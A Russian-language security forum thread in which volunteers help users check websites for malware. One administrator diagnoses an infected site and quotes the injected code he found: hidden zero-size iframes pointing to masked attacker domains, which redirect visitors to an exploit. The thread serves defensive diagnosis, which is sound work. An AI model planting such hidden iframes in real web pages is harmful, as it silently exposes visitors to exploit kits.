Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте в этой теме

akok

Команда форума
Администратор
Сообщения
19,319
Реакции
13,335
Баллы
2,203
  • Первое сообщение
  • #1
Нашим ресурсом оказываются услуги по проверке интернет ресурсов на наличие вредоносного кода.

Прошу учесть, что помощь оказывается добровольцами и поэтому не требуйте немедленной помощи. Вам обязательно окажут помощь.

Если вы хотите проверить сайт на вирусы, то выполните простые правила оформления запроса:
  1. Администрация имеет право отказать в проверке, в случае, если проверяемый ресурс нарушает законодательство или правила данного ресурса (варез, хакерская тематика, материалы порнографического характера).
  2. Никогда не публикуйте активных ссылок. (заменяйте http на хттп, например http://safezone.cc - нужно писать как хттп://safezone.cc)
  3. Не прикрепляйте файлы, которые предлагают вам скачать подозреваемые сайты. (Просто укажите имя файла, который пытается загрузится).
  4. Если Вы подозреваете, что после посещения подозрительного сайта Ваш компьютер подвергся заражению, то лучше выполнить правила оформления запроса.

*Мы не можем гарантировать 100% результат анализа. Слишком много факторов которых невозможно учесть.
 

akok

Команда форума
Администратор
Сообщения
19,319
Реакции
13,335
Баллы
2,203
Эта радость крутится через партнерку от vestraff.com если не ошибаюсь. Там таких "мошенников" рекламируют не мало.

А вот признаков вредоносного кода не вижу.
 

tactic

Активный пользователь
Сообщения
28
Реакции
11
Баллы
403
Пользовался все время этим сайтом, проблем не было, а сегодня Avast сработал :eek:

 

magirus

Активный пользователь
Сообщения
83
Реакции
34
Баллы
408
похоже уже пофиксили.
(ps у меня тоже Аваст, промолчал.)
 

akok

Команда форума
Администратор
Сообщения
19,319
Реакции
13,335
Баллы
2,203
Мой ответ съело переездом :)
 

Indomito

Активный пользователь
Сообщения
51
Реакции
32
Баллы
408
Там уже чисто, переключились сюда:
Название угрозы: Downloader
Расположение: amzinas.com
 
Последнее редактирование:

akok

Команда форума
Администратор
Сообщения
19,319
Реакции
13,335
Баллы
2,203
Indomito, отключен сайт сейчас.
 

akok

Команда форума
Администратор
Сообщения
19,319
Реакции
13,335
Баллы
2,203
Сейчас ссылки ведут на домен mail.ru...
 

akok

Команда форума
Администратор
Сообщения
19,319
Реакции
13,335
Баллы
2,203
Или было обнаружено вторжение в систему... вот администрация и страхуется.
 

pepper65

Активный пользователь
Сообщения
8
Реакции
0
Баллы
391
Здравствуйте!
Не могли-бы Вы проверить вот этот сайтик: ххх://istur.ru
C сегодняшнего дня просмотр в Mozilla заблокирован: "Имеется информация о том, что веб-страница istur.ru используется для атак на компьютеры пользователей. В соответствии с вашими настройками безопасности она была заблокирована."
Заранее, спасибо!
 

akok

Команда форума
Администратор
Сообщения
19,319
Реакции
13,335
Баллы
2,203
Сайт заражен

Добавлено через 5 минут 17 секунд
Пытается выдать эксплойт для Adobe
 

pepper65

Активный пользователь
Сообщения
8
Реакции
0
Баллы
391
Вижу, что заражен!!!!
У меня стоит Avira PSS - молчит!
Dr. Web- проверка on-line тоже молчит!!!
Перерыл все индекс, main и т.д. - не нашел!!
Что еще смотреть????
Спасибо!
 

akok

Команда форума
Администратор
Сообщения
19,319
Реакции
13,335
Баллы
2,203
PHP:
<iframe src="http://****.com/index.php" width=0 height=0></iframe>

с редиректом
PHP:
<iframe src="http://****.com//viewtopic.php" width="162" height="128" frameborder="0"></iframe>
 

pepper65

Активный пользователь
Сообщения
8
Реакции
0
Баллы
391
Ссори, я понимаю, что "торможу"!!
Где искать? В каких файлах?
 
Последнее редактирование:

pepper65

Активный пользователь
Сообщения
8
Реакции
0
Баллы
391
Спасибо большое!
Если Вам не составит большого труда, может отпишитесь "по-точнее". С нетерпением буду ждать!!!
ещё раз огромное спасибо!
 

akok

Команда форума
Администратор
Сообщения
19,319
Реакции
13,335
Баллы
2,203
В коде:
PHP:
</script><script type="text/javascript" src="http://istur.ru/templates/younews/src/mouseover.js"></script><style type="text/css">
.button,.validate,
.pollbuttons .button {
padding:0 0 4px 0px;
}
</style></head><body id="color"><iframe src="http://dyna55.***/index.php" height="0" width="0"></iframe>
Необходимо проверить содержимое всех файлов с эталоном. А так же необходимо обратится в вирлаб за помощью т.к. заражение довольно сложное для стандартных методов анализа.

http://support.kaspersky.ru/virlab/helpdesk.html

Добавлено через 23 минуты 23 секунды
И особенно присмотритесь:
[[[]]]://istur.ru/templates/younews/src/mouseover.js
 

pepper65

Активный пользователь
Сообщения
8
Реакции
0
Баллы
391
Я сам файл не могу найти!!!!!!!!!!!!
В этом [[[]]]://istur.ru/templates/younews/src/mouseover.js нет iframe
 
Последнее редактирование:
Сверху Снизу